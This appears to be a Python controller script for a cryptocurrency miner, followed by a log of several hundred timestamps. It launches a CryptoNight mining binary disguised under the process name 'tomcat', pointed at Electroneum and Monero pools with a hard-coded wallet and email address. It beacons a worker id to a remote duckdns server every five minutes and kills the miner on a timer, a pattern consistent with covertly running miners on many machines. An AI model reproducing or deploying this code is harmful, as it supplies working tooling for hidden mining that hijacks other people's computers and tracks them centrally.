import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:03.504692
#2018-02-17 17:36:05.012819
#2018-02-17 19:24:05.788310
#2018-02-17 21:13:07.115856
#2018-02-17 22:57:04.677260
#2018-02-18 00:41:06.960489
#2018-02-18 02:31:01.697883
#2018-02-18 04:17:07.276844
#2018-02-18 06:07:04.183824
#2018-02-18 07:56:01.880170
#2018-02-18 09:44:01.574191
#2018-02-18 11:31:01.698413
#2018-02-18 13:17:01.745116
#2018-02-18 15:06:07.258000
#2018-02-18 16:53:06.240145
#2018-02-18 18:42:03.986548
#2018-02-18 20:29:01.296670
#2018-02-18 22:14:05.938134
#2018-02-19 00:03:01.832410
#2018-02-19 01:48:04.372980
#2018-02-19 03:35:05.863186
#2018-02-19 05:20:02.916556
#2018-02-19 07:07:05.048629
#2018-02-19 08:56:07.425837
#2018-02-19 10:45:07.594774
#2018-02-19 12:34:04.582160
#2018-02-19 14:23:06.834460
#2018-02-19 16:12:09.020740
#2018-02-19 18:00:05.808427
#2018-02-19 19:46:01.226589
#2018-02-19 21:33:08.111988
#2018-02-19 23:19:07.681546
#2018-02-20 01:05:07.411727
#2018-02-20 02:54:04.224850
#2018-02-20 04:42:05.036728
#2018-02-20 06:26:07.026271
#2018-02-20 08:11:05.424459
#2018-02-20 09:56:01.799628
#2018-02-20 11:38:09.026327
#2018-02-20 13:25:06.954401
#2018-02-20 15:11:07.127748
#2018-02-20 16:56:01.407976
#2018-02-20 18:44:06.602982
#2018-02-20 20:36:07.446722
#2018-02-20 22:22:06.679749
#2018-02-21 00:03:04.288327
#2018-02-21 01:48:01.383502
#2018-02-21 03:32:02.216277
#2018-02-21 05:21:05.291226
#2018-02-21 07:08:07.080946
#2018-02-21 08:54:01.891998
#2018-02-21 10:41:09.022083
#2018-02-21 12:28:06.690372
#2018-02-21 14:14:06.817675
#2018-02-21 16:01:09.782108
#2018-02-21 17:52:05.414374
#2018-02-21 19:37:01.663407
#2018-02-21 21:24:01.679864
#2018-02-21 23:10:06.107612
#2018-02-22 00:58:04.361156
#2018-02-22 02:46:06.164824
#2018-02-22 04:32:01.716267
#2018-02-22 06:17:06.035458
#2018-02-22 08:03:08.368255
#2018-02-22 09:51:07.771517
#2018-02-22 11:36:01.854279
#2018-02-22 13:22:08.364507
#2018-02-22 15:10:02.719469
#2018-02-22 16:53:04.839640
#2018-02-22 18:42:08.114154
#2018-02-22 20:34:01.976796
#2018-02-22 22:20:01.929366
#2018-02-23 00:06:02.207117
#2018-02-23 01:54:06.527059
#2018-02-23 03:41:05.389919
#2018-02-23 05:27:01.251862
#2018-02-23 07:12:07.767024
#2018-02-23 09:17:03.872993
#2018-02-23 11:22:04.992214
#2018-02-23 13:12:07.091394
#2018-02-23 14:57:06.878298
#2018-02-23 16:45:10.695691
#2018-02-23 18:32:01.776078
#2018-02-23 20:18:05.044447
#2018-02-23 22:06:05.270075
#2018-02-23 23:54:07.411462
#2018-02-24 01:43:06.886036
#2018-02-24 03:34:06.745494
#2018-02-24 05:18:01.776193
#2018-02-24 07:06:05.248012
#2018-02-24 08:53:04.876352
#2018-02-24 10:54:04.985438
#2018-02-24 12:42:01.748102
#2018-02-24 14:31:01.224453
#2018-02-24 16:18:05.250106
#2018-02-24 18:12:05.600536
#2018-02-24 19:58:04.310696
#2018-02-24 21:41:04.899246
#2018-02-25 02:03:05.499132
#2018-02-25 06:01:02.144098
#2018-02-25 11:39:08.011168